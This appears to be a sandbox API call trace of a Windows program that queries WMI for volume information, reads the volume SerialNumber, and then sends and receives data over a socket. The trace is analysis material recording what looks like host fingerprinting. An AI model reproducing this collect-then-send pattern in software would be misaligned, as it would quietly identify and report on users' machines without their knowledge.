	[0244.626] IUnknown:Release (This=0x635d464) returned 0x2
	[0244.626] IUnknown:Release (This=0x635d464) returned 0x1
	[0244.633] CoGetContextToken (in: pToken=0x5dee5b8 | out: pToken=0x5dee5b8) returned 0x0
	[0244.633] CoGetContextToken (in: pToken=0x5dee578 | out: pToken=0x5dee578) returned 0x0
	[0244.633] WbemLocator:IUnknown:AddRef (This=0x7f8f4c) returned 0x2
	[0244.633] WbemLocator:IUnknown:QueryInterface (in: This=0x7f8f4c, riid=0x5dee5f4*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5dee5f0 | out: ppvObject=0x5dee5f0*=0x635d464) returned 0x0
	[0244.633] WbemLocator:IUnknown:Release (This=0x7f8f4c) returned 0x2
	[0244.633] IUnknown:AddRef (This=0x635d464) returned 0x3
	[0244.633] IEnumWbemClassObject:Reset (This=0x635d464) returned 0x0
	[0244.644] IUnknown:Release (This=0x635d464) returned 0x2
	[0244.648] CoGetContextToken (in: pToken=0x5dee4ac | out: pToken=0x5dee4ac) returned 0x0
	[0244.648] IUnknown:AddRef (This=0x635d464) returned 0x3
	[0244.649] IEnumWbemClassObject:Next (in: This=0x635d464, lTimeout=-1, uCount=0x1, apObjects=0x769e88, puReturned=0x2fdf8d0 | out: apObjects=0x769e88*=0x635d4a0, puReturned=0x2fdf8d0*=0x1) returned 0x0
	[0245.593] IUnknown:QueryInterface (in: This=0x635d4a0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedab8 | out: ppvObject=0x5dedab8*=0x635d4a0) returned 0x0
	[0245.593] IUnknown:QueryInterface (in: This=0x635d4a0, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5deda74 | out: ppvObject=0x5deda74*=0x0) returned 0x80004002
	[0245.593] IUnknown:QueryInterface (in: This=0x635d4a0, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5ded968 | out: ppvObject=0x5ded968*=0x0) returned 0x80004002
	[0245.594] IUnknown:AddRef (This=0x635d4a0) returned 0x3
	[0245.594] CoGetContextToken (in: pToken=0x5ded900 | out: pToken=0x5ded900) returned 0x0
	[0245.594] IUnknown:QueryInterface (in: This=0x635d4a0, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5ded8e8 | out: ppvObject=0x5ded8e8*=0x635d4a4) returned 0x0
	[0245.594] IMarshal:GetUnmarshalClass (in: This=0x635d4a4, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5ded8f0 | out: pCid=0x5ded8f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0
	[0245.594] IUnknown:Release (This=0x635d4a4) returned 0x3
	[0245.595] CoGetContextToken (in: pToken=0x5ded8f8 | out: pToken=0x5ded8f8) returned 0x0
	[0245.595] IUnknown:AddRef (This=0x635d4a0) returned 0x4
	[0245.595] IUnknown:QueryInterface (in: This=0x635d4a0, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5ded96c | out: ppvObject=0x5ded96c*=0x0) returned 0x80004002
	[0245.595] IUnknown:Release (This=0x635d4a0) returned 0x3
	[0245.595] IUnknown:Release (This=0x635d4a0) returned 0x2
	[0245.595] CoGetContextToken (in: pToken=0x5dedd58 | out: pToken=0x5dedd58) returned 0x0
	[0245.595] CoGetContextToken (in: pToken=0x5dedd18 | out: pToken=0x5dedd18) returned 0x0
	[0245.595] IUnknown:AddRef (This=0x635d4a0) returned 0x3
	[0245.595] IUnknown:QueryInterface (in: This=0x635d4a0, riid=0x5dedd94*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x5dedd90 | out: ppvObject=0x5dedd90*=0x635d4a0) returned 0x0
	[0245.595] IUnknown:Release (This=0x635d4a0) returned 0x3
	[0245.596] IUnknown:Release (This=0x635d4a0) returned 0x2
	[0245.596] IUnknown:Release (This=0x635d4a0) returned 0x1
	[0245.596] IUnknown:Release (This=0x635d464) returned 0x2
	[0245.596] CoGetContextToken (in: pToken=0x5dee63c | out: pToken=0x5dee63c) returned 0x0
	[0245.596] IUnknown:AddRef (This=0x635d4a0) returned 0x2
	[0245.602] IWbemClassObject:Get (in: This=0x635d4a0, wszName="__GENUS", lFlags=0, pVal=0x5dee6b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x5dee76c*=0, plFlavor=0x5dee768*=0 | out: pVal=0x5dee6b8*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x5dee76c*=3, plFlavor=0x5dee768*=64) returned 0x0
	[0245.602] IWbemClassObject:Get (in: This=0x635d4a0, wszName="__PATH", lFlags=0, pVal=0x5dee698*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x5dee750*=0, plFlavor=0x5dee74c*=0 | out: pVal=0x5dee698*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"", varVal2=0x0), pType=0x5dee750*=8, plFlavor=0x5dee74c*=64) returned 0x0
	[0245.602] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x64
	[0245.603] CoGetObjectContext (in: riid=0x2fdab50*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5dee6f0 | out: ppv=0x5dee6f0*=0x718dec) returned 0x0
	[0245.603] IComThreadingInfo:GetCurrentApartmentType (in: This=0x718dec, pAptType=0x5dee6e8 | out: pAptType=0x5dee6e8*=1) returned 0x0
	[0245.603] IUnknown:QueryInterface (in: This=0x718dec, riid=0x2fdab38*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5dee6ec | out: ppvObject=0x5dee6ec*=0x0) returned 0x80004002
	[0245.603] IUnknown:Release (This=0x718dec) returned 0x1
	[0245.603] CoGetClassObject (in: rclsid=0x7d79e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5dee208 | out: ppv=0x5dee208*=0x635cb70) returned 0x0
	[0245.604] WbemDefPath:IUnknown:QueryInterface (in: This=0x635cb70, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5dee038 | out: ppvObject=0x5dee038*=0x0) returned 0x80004002
	[0245.604] WbemDefPath:IClassFactory:CreateInstance (in: This=0x635cb70, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee070 | out: ppvObject=0x5dee070*=0x635d638) returned 0x0
	[0245.604] WbemDefPath:IUnknown:QueryInterface (in: This=0x635d638, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dede14 | out: ppvObject=0x5dede14*=0x635d638) returned 0x0
	[0245.604] WbemDefPath:IUnknown:QueryInterface (in: This=0x635d638, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5deddd0 | out: ppvObject=0x5deddd0*=0x0) returned 0x80004002
	[0245.605] WbemDefPath:IUnknown:AddRef (This=0x635d638) returned 0x3
	[0245.605] CoGetContextToken (in: pToken=0x5dedc5c | out: pToken=0x5dedc5c) returned 0x0
	[0245.605] WbemDefPath:IUnknown:QueryInterface (in: This=0x635d638, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedc44 | out: ppvObject=0x5dedc44*=0x7ed400) returned 0x0
	[0245.605] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7ed400, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5dedc4c | out: pCid=0x5dedc4c*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0245.605] WbemDefPath:IUnknown:Release (This=0x7ed400) returned 0x3
	[0245.605] CoGetContextToken (in: pToken=0x5dedc54 | out: pToken=0x5dedc54) returned 0x0
	[0245.605] WbemDefPath:IUnknown:AddRef (This=0x635d638) returned 0x4
	[0245.605] WbemDefPath:IUnknown:QueryInterface (in: This=0x635d638, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedcc8 | out: ppvObject=0x5dedcc8*=0x0) returned 0x80004002
	[0245.605] WbemDefPath:IUnknown:Release (This=0x635d638) returned 0x3
	[0245.606] WbemDefPath:IUnknown:Release (This=0x635d638) returned 0x2
	[0245.606] WbemDefPath:IUnknown:Release (This=0x635cb70) returned 0x0
	[0245.606] WbemDefPath:IUnknown:Release (This=0x635d638) returned 0x1
	[0245.606] CoGetContextToken (in: pToken=0x5dee504 | out: pToken=0x5dee504) returned 0x0
	[0245.606] CoGetContextToken (in: pToken=0x5dee4c4 | out: pToken=0x5dee4c4) returned 0x0
	[0245.606] WbemDefPath:IUnknown:AddRef (This=0x635d638) returned 0x2
	[0245.606] WbemDefPath:IUnknown:QueryInterface (in: This=0x635d638, riid=0x5dee540*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5dee53c | out: ppvObject=0x5dee53c*=0x635d638) returned 0x0
	[0245.606] WbemDefPath:IUnknown:Release (This=0x635d638) returned 0x2
	[0245.606] WbemDefPath:IUnknown:Release (This=0x635d638) returned 0x1
	[0245.607] CoGetContextToken (in: pToken=0x5dee584 | out: pToken=0x5dee584) returned 0x0
	[0245.607] CoGetContextToken (in: pToken=0x5dee544 | out: pToken=0x5dee544) returned 0x0
	[0245.607] WbemDefPath:IUnknown:AddRef (This=0x635d638) returned 0x2
	[0245.607] WbemDefPath:IUnknown:QueryInterface (in: This=0x635d638, riid=0x5dee5c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5dee5bc | out: ppvObject=0x5dee5bc*=0x635d638) returned 0x0
	[0245.607] WbemDefPath:IUnknown:Release (This=0x635d638) returned 0x2
	[0245.607] WbemDefPath:IUnknown:AddRef (This=0x635d638) returned 0x3
	[0245.607] WbemDefPath:IWbemPath:SetText (This=0x635d638, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x0
	[0245.607] WbemDefPath:IUnknown:Release (This=0x635d638) returned 0x2
	[0245.607] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6350820, puCount=0x5dee724 | out: puCount=0x5dee724*=0x2) returned 0x0
	[0245.607] WbemDefPath:IWbemPath:GetText (in: This=0x6350820, lFlags=4, puBuffLength=0x5dee720*=0x0, pszText=0x0 | out: puBuffLength=0x5dee720*=0x17, pszText=0x0) returned 0x0
	[0245.607] WbemDefPath:IWbemPath:GetText (in: This=0x6350820, lFlags=4, puBuffLength=0x5dee720*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee720*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0245.608] CoGetContextToken (in: pToken=0x5dee4ac | out: pToken=0x5dee4ac) returned 0x0
	[0245.608] IUnknown:AddRef (This=0x635d464) returned 0x3
	[0245.608] IEnumWbemClassObject:Next (in: This=0x635d464, lTimeout=-1, uCount=0x1, apObjects=0x769e88, puReturned=0x2fdf8d0 | out: apObjects=0x769e88*=0x0, puReturned=0x2fdf8d0*=0x0) returned 0x1
	[0245.653] IUnknown:Release (This=0x635d464) returned 0x2
	[0245.655] CoGetContextToken (in: pToken=0x5dee5f4 | out: pToken=0x5dee5f4) returned 0x0
	[0245.655] WbemLocator:IUnknown:Release (This=0x7f8f4c) returned 0x1
	[0245.655] IUnknown:Release (This=0x635d464) returned 0x0
	[0245.701] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6350820, puCount=0x5dee798 | out: puCount=0x5dee798*=0x2) returned 0x0
	[0245.701] WbemDefPath:IWbemPath:GetText (in: This=0x6350820, lFlags=4, puBuffLength=0x5dee794*=0x0, pszText=0x0 | out: puBuffLength=0x5dee794*=0x17, pszText=0x0) returned 0x0
	[0245.701] WbemDefPath:IWbemPath:GetText (in: This=0x6350820, lFlags=4, puBuffLength=0x5dee794*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee794*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0245.701] IWbemClassObject:Get (in: This=0x635d4a0, wszName="__NAMESPACE", lFlags=0, pVal=0x5dee754*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fe0c10*=0, plFlavor=0x2fe0c14*=0 | out: pVal=0x5dee754*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x2fe0c10*=8, plFlavor=0x2fe0c14*=64) returned 0x0
	[0245.701] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0245.702] IWbemClassObject:Get (in: This=0x635d4a0, wszName="__NAMESPACE", lFlags=0, pVal=0x5dee758*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fe0c10*=8, plFlavor=0x2fe0c14*=64 | out: pVal=0x5dee758*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x2fe0c10*=8, plFlavor=0x2fe0c14*=64) returned 0x0
	[0245.702] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0245.702] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6350820, puCount=0x5dee798 | out: puCount=0x5dee798*=0x2) returned 0x0
	[0245.702] WbemDefPath:IWbemPath:GetText (in: This=0x6350820, lFlags=4, puBuffLength=0x5dee794*=0x0, pszText=0x0 | out: puBuffLength=0x5dee794*=0x17, pszText=0x0) returned 0x0
	[0245.702] WbemDefPath:IWbemPath:GetText (in: This=0x6350820, lFlags=4, puBuffLength=0x5dee794*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee794*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0245.702] IWbemClassObject:Get (in: This=0x635d4a0, wszName="__CLASS", lFlags=0, pVal=0x5dee754*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fe0cc8*=0, plFlavor=0x2fe0ccc*=0 | out: pVal=0x5dee754*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume", varVal2=0x0), pType=0x2fe0cc8*=8, plFlavor=0x2fe0ccc*=64) returned 0x0
	[0245.702] SysStringLen (param_1="Win32_Volume") returned 0xc
	[0245.703] IWbemClassObject:Get (in: This=0x635d4a0, wszName="__CLASS", lFlags=0, pVal=0x5dee758*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fe0cc8*=8, plFlavor=0x2fe0ccc*=64 | out: pVal=0x5dee758*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume", varVal2=0x0), pType=0x2fe0cc8*=8, plFlavor=0x2fe0ccc*=64) returned 0x0
	[0245.703] SysStringLen (param_1="Win32_Volume") returned 0xc
	[0245.723] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6350820, puCount=0x5dee788 | out: puCount=0x5dee788*=0x2) returned 0x0
	[0245.723] WbemDefPath:IWbemPath:GetText (in: This=0x6350820, lFlags=4, puBuffLength=0x5dee784*=0x0, pszText=0x0 | out: puBuffLength=0x5dee784*=0x17, pszText=0x0) returned 0x0
	[0245.723] WbemDefPath:IWbemPath:GetText (in: This=0x6350820, lFlags=4, puBuffLength=0x5dee784*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee784*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0245.723] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6350820, puCount=0x5dee788 | out: puCount=0x5dee788*=0x2) returned 0x0
	[0245.723] WbemDefPath:IWbemPath:GetText (in: This=0x6350820, lFlags=4, puBuffLength=0x5dee784*=0x0, pszText=0x0 | out: puBuffLength=0x5dee784*=0x17, pszText=0x0) returned 0x0
	[0245.723] WbemDefPath:IWbemPath:GetText (in: This=0x6350820, lFlags=4, puBuffLength=0x5dee784*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee784*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0245.724] IWbemClassObject:GetNames (in: This=0x635d4a0, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x5dee74c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x5dee718 | out: pNames=0x5dee718*="\x01ƀ\x04") returned 0x0
	[0245.727] SafeArrayGetDim (psa=0x7f8448) returned 0x1
	[0245.727] SafeArrayGetDim (psa=0x7f8448) returned 0x1
	[0245.727] SafeArrayGetLBound (in: psa=0x7f8448, nDim=0x1, plLbound=0x5dee314 | out: plLbound=0x5dee314) returned 0x0
	[0245.728] IWbemClassObject:Get (in: This=0x635d4a0, wszName="__GENUS", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fe16c8*=0, plFlavor=0x2fe16cc*=0 | out: pVal=0x5dee744*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x2fe16c8*=3, plFlavor=0x2fe16cc*=64) returned 0x0
	[0245.728] IWbemClassObject:Get (in: This=0x635d4a0, wszName="__CLASS", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fe16fc*=0, plFlavor=0x2fe1700*=0 | out: pVal=0x5dee744*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume", varVal2=0x0), pType=0x2fe16fc*=8, plFlavor=0x2fe1700*=64) returned 0x0
	[0245.728] SysStringLen (param_1="Win32_Volume") returned 0xc
	[0245.728] IWbemClassObject:Get (in: This=0x635d4a0, wszName="__SUPERCLASS", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fe1750*=0, plFlavor=0x2fe1754*=0 | out: pVal=0x5dee744*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_StorageVolume", varVal2=0x0), pType=0x2fe1750*=8, plFlavor=0x2fe1754*=64) returned 0x0
	[0245.729] SysStringLen (param_1="CIM_StorageVolume") returned 0x11
	[0245.729] IWbemClassObject:Get (in: This=0x635d4a0, wszName="__DYNASTY", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fe17ac*=0, plFlavor=0x2fe17b0*=0 | out: pVal=0x5dee744*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_ManagedSystemElement", varVal2=0x0), pType=0x2fe17ac*=8, plFlavor=0x2fe17b0*=64) returned 0x0
	[0245.732] SysStringLen (param_1="CIM_ManagedSystemElement") returned 0x18
	[0245.732] IWbemClassObject:Get (in: This=0x635d4a0, wszName="__RELPATH", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fe1818*=0, plFlavor=0x2fe181c*=0 | out: pVal=0x5dee744*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"", varVal2=0x0), pType=0x2fe1818*=8, plFlavor=0x2fe181c*=64) returned 0x0
	[0245.732] SysStringLen (param_1="Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x4d
	[0245.732] IWbemClassObject:Get (in: This=0x635d4a0, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fe18ec*=0, plFlavor=0x2fe18f0*=0 | out: pVal=0x5dee744*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2c, varVal2=0x0), pType=0x2fe18ec*=3, plFlavor=0x2fe18f0*=64) returned 0x0
	[0245.733] IWbemClassObject:Get (in: This=0x635d4a0, wszName="__DERIVATION", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fe1920*=0, plFlavor=0x2fe1924*=0 | out: pVal=0x5dee744*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7f8448*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x7e5e78, rgsabound=((cElements=0x5, lLbound=0))), varVal2=0x0), pType=0x2fe1920*=8200, plFlavor=0x2fe1924*=64) returned 0x0
	[0245.734] IWbemClassObject:Get (in: This=0x635d4a0, wszName="__SERVER", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fe1a84*=0, plFlavor=0x2fe1a88*=0 | out: pVal=0x5dee744*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x2fe1a84*=8, plFlavor=0x2fe1a88*=64) returned 0x0
	[0245.734] SysStringLen (param_1="XDUWTFONO") returned 0x9
	[0245.734] IWbemClassObject:Get (in: This=0x635d4a0, wszName="__NAMESPACE", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fe1ad0*=0, plFlavor=0x2fe1ad4*=0 | out: pVal=0x5dee744*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x2fe1ad0*=8, plFlavor=0x2fe1ad4*=64) returned 0x0
	[0245.734] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0245.734] IWbemClassObject:Get (in: This=0x635d4a0, wszName="__PATH", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fe1b20*=0, plFlavor=0x2fe1b24*=0 | out: pVal=0x5dee744*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"", varVal2=0x0), pType=0x2fe1b20*=8, plFlavor=0x2fe1b24*=64) returned 0x0
	[0245.734] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x64
	[0245.734] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6350820, puCount=0x5dee7c4 | out: puCount=0x5dee7c4*=0x2) returned 0x0
	[0245.734] WbemDefPath:IWbemPath:GetText (in: This=0x6350820, lFlags=4, puBuffLength=0x5dee7c0*=0x0, pszText=0x0 | out: puBuffLength=0x5dee7c0*=0x17, pszText=0x0) returned 0x0
	[0245.734] WbemDefPath:IWbemPath:GetText (in: This=0x6350820, lFlags=4, puBuffLength=0x5dee7c0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee7c0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0245.735] IWbemClassObject:Get (in: This=0x635d4a0, wszName="SerialNumber", lFlags=0, pVal=0x5dee780*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fe1c74*=0, plFlavor=0x2fe1c78*=0 | out: pVal=0x5dee780*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9c354b42, varVal2=0x0), pType=0x2fe1c74*=19, plFlavor=0x2fe1c78*=0) returned 0x0
	[0245.735] IWbemClassObject:Get (in: This=0x635d4a0, wszName="SerialNumber", lFlags=0, pVal=0x5dee838*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fe1c74*=19, plFlavor=0x2fe1c78*=0 | out: pVal=0x5dee838*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9c354b42, varVal2=0x0), pType=0x2fe1c74*=19, plFlavor=0x2fe1c78*=0) returned 0x0
	[0246.032] send (s=0x420, buf=0x2ff0888*, len=71, flags=0) returned 71
	[0246.033] GetLastError () returned 0x0
	[0246.037] recv (in: s=0x420, buf=0x2f5db30, len=502, flags=0 | out: buf=0x2f5db30*) returned 502
	[0246.037] GetLastError () returned 0x0
